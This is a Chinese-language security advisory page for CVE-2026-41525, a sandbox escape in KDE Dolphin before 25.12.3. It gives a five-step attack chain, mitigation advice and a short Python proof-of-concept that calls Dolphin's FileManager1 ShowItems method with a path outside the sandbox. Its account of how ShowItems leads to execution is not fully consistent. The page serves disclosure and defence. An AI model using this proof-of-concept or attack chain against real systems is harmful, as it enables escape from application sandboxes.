CVE-2026-41525 CVSS 6.5 中危

CVE-2026-41525 KDE Dolphin沙箱逃逸漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41525

漏洞类型

沙箱逃逸

CVSS评分

6.5 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

KDE Dolphin

漏洞概述

KDE Dolphin在25.12.3之前的版本中存在安全缺陷。该漏洞允许运行在Flatpak或AppArmor沙箱环境下的应用程序，利用Dolphin实现的FileManager1协议，请求打开位于沙箱之外的任意文件夹或文件。尽管Dolphin会对脚本或可执行文件提示用户确认，但这未完全阻断访问，违反了沙箱隔离的原则。攻击者可利用此漏洞诱导用户执行沙箱外的恶意程序，绕过安全边界，导致数据泄露或系统完整性受损。

技术细节

该漏洞源于KDE Dolphin对D-Bus接口`org.freedesktop.FileManager1`的处理逻辑不当。FileManager1接口旨在允许应用程序调用文件管理器显示特定路径，但Dolphin在实现时未能严格验证调用者的上下文权限。在受影响版本中，沙箱内的应用（如Flatpak应用）可以通过D-Bus向宿主机的Dolphin服务发送请求，指定任意系统路径（包括`/etc/passwd`或恶意脚本）。利用该漏洞时，攻击者诱导用户运行恶意应用，该应用调用`ShowItems`方法传入沙箱外的恶意文件路径。由于Dolphin未拦截来自沙箱的请求，它会弹出对话框询问用户是否执行。一旦用户被诱导点击确认，Dolphin将以宿主机权限执行该文件，从而绕过沙箱的限制。

攻击链分析

STEP 1

步骤1

攻击者诱导用户安装并运行一个恶意的Flatpak沙箱应用。

STEP 2

步骤2

恶意应用通过D-Bus总线调用宿主机Dolphin的FileManager1接口，传入沙箱外的恶意文件路径（如脚本或可执行文件）。

STEP 3

步骤3

Dolphin接收到请求，未正确识别调用者来自受限环境，弹出对话框询问用户是否打开或执行该文件。

STEP 4

步骤4

用户受到社会工程学诱导，点击对话框中的“运行”或“确认”按钮。

STEP 5

步骤5

Dolphin以宿主机的权限执行了沙箱外的恶意文件，导致沙箱隔离失效，造成系统被控制或数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-41525: Dolphin FileManager1 Sandbox Bypass
# This script simulates a malicious Flatpak app calling the D-Bus interface.
import dbus

def exploit_dolphin_sandbox_escape(target_file):
    # Connect to the session bus
    bus = dbus.SessionBus()
    
    # The object path and interface for Dolphin's FileManager1
    dolphin_object = bus.get_object('org.freedesktop.FileManager1', '/org/freedesktop/FileManager1')
    file_manager_interface = dbus.Interface(dolphin_object, 'org.freedesktop.FileManager1')
    
    # Construct the URI pointing to a file outside the sandbox
    uri = f"file://{target_file}"
    
    try:
        # Call ShowItems method. This triggers Dolphin to prompt the user.
        file_manager_interface.ShowItems([uri], "")
        print(f"[+] Request sent to Dolphin to open: {uri}")
        print("[+] If user clicks 'Run', sandbox is bypassed.")
    except dbus.exceptions.DBusException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Example: Attempting to open a script in the user's home directory
    exploit_dolphin_sandbox_escape("/home/user/malicious_script.sh")

影响范围

KDE Dolphin < 25.12.3

防御指南

临时缓解措施

建议用户立即升级到修复版本。在未升级前，应提高警惕，对于来自沙箱应用的文件打开请求，尤其是弹出的执行确认对话框，应仔细核实文件来源和内容后再决定是否执行，避免随意点击确认。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表